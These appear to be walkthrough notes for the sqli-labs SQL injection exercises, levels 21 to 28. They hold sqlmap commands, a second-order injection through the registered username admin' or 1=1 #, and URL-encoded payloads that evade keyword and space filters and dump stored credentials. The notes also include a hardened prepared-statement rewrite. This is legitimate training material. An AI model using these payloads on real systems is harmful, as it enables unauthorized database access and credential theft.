21
Steps
Manual
Injection point:
cookie
sqlmap
python sqlmap.py -r temp.txt --tamper base64encode.py --batch --dbms mysql
22
Same as above, with ') replaced by "
23
Comment characters are filtered; just close the trailing single quote instead.
sqlmap
24
Steps
Manual
// Less-24 password-change handler (lab code as on the page, reindented).
// $username is read from the session and concatenated into the query
// without escaping; only the three password fields are escaped.
if (isset($_POST['submit']))
{
    # Validating the user input........
    $username = $_SESSION["username"];
    $curr_pass = mysql_real_escape_string($_POST['current_password']);
    $pass = mysql_real_escape_string($_POST['password']);
    $re_pass = mysql_real_escape_string($_POST['re_password']);
    if ($pass == $re_pass)
    {
        $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
        $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
        $row = mysql_affected_rows();
        echo '<font size="3" color="#FFFF00">';
        echo '<center>';
        if ($row == 1)
        {
            echo "Password successfully updated";
        }
        else
        {
            header('Location: failed.php');
            //echo 'You tried to be smart, Try harder!!!! :( ';
        }
    }
    else
    {
        echo '<font size="5" color="#FFFF00"><center>';
        echo "Make sure New Password and Retype Password fields have same value";
        header('refresh:2, url=index.php');
    }
}
Register an account named admin' or 1=1 #
Change this account's password, and every user's password is changed, because the stored username is trusted once it comes back out of the session and lands in the UPDATE unescaped.
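The defect in the handler above is not the three escaped password fields but the unescaped $username: it is attacker-chosen at registration time, survives into the database, and is then concatenated into the UPDATE as trusted data (a second-order injection). Escaping it here would paper over the symptom; the fix is to bind every value. The following is an added, hardened rewrite using mysqli prepared statements. It is example code, not part of sqli-labs or the original notes, and it assumes an open mysqli connection in $conn and a started session:

```php
<?php
// Added example: hardened version of the Less-24 password-change handler.
// Assumptions: $conn is an open mysqli connection and session_start() has run.
// Not part of sqli-labs or the original notes.

function change_password(mysqli $conn, string $username, string $curr_pass,
                         string $new_pass, string $re_pass): bool
{
    if ($new_pass !== $re_pass) {
        return false;
    }

    // Values are bound, never concatenated: a username such as
    // admin' or 1=1 # is compared as one literal string, so the WHERE
    // clause can match that single user row and nothing else.
    $stmt = $conn->prepare(
        "UPDATE users SET password = ? WHERE username = ? AND password = ?"
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('sss', $new_pass, $username, $curr_pass);
    $stmt->execute();

    // Exactly one row must change. 0 means a wrong current password or no
    // such user (and, as in the lab code, a new password equal to the old one).
    $updated = ($stmt->affected_rows === 1);
    $stmt->close();
    return $updated;
}

if (isset($_POST['submit'])) {
    $ok = change_password(
        $conn,
        $_SESSION['username'],
        $_POST['current_password'] ?? '',
        $_POST['password'] ?? '',
        $_POST['re_password'] ?? ''
    );
    if ($ok) {
        echo 'Password successfully updated';
    } else {
        // Redirect before any output so the Location header is actually sent;
        // the lab code echoes first, which breaks header().
        header('Location: failed.php');
        exit;
    }
}
```

The example keeps the lab's plaintext password comparison so the query shape stays recognisable; a real application would store a password_hash() digest, fetch the row by username and check it with password_verify() instead of matching the password column in SQL. Note also that with bound parameters the mysql_real_escape_string() calls become unnecessary, and that the affected-row check of exactly 1 is what prevents a single request from touching more than one account.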
sqlmap
25
Steps
Manual
and and or are filtered; double-write them or use || instead.
sqlmap
26
Steps
Manual
and and or are filtered (double-write them or use || instead), and comment characters, spaces and slashes are filtered as well.
payload:1%27oorr(extractvalue(1,concat(0x7e,(select(database())),0x7e)))aandnd%20%271%27=%271
26a
Steps
Manual
payload:?id=0%27)%0a%20union%a0%20select%a0%201,2,(select%a0%20group_concat(%20concat_ws(%200x7e,username,passwoorrd%20))%20%a0from%20(%a0security.users))%20;%00
27
Steps
Manual
payload:0%27ununionion%0aseLect%0a1,2,3;%00
27a
Steps
Manual
Same as above, with ' changed to "
payload:0"ununionion%0aseLect%0a1,2,3;%00
28
Steps
Manual
union select is filtered case-insensitively; placing all or distinct between the two keywords gets past it.
payload:?id=0%27)%0aunIon%0aall%0aseLect%0a1,2,3;%00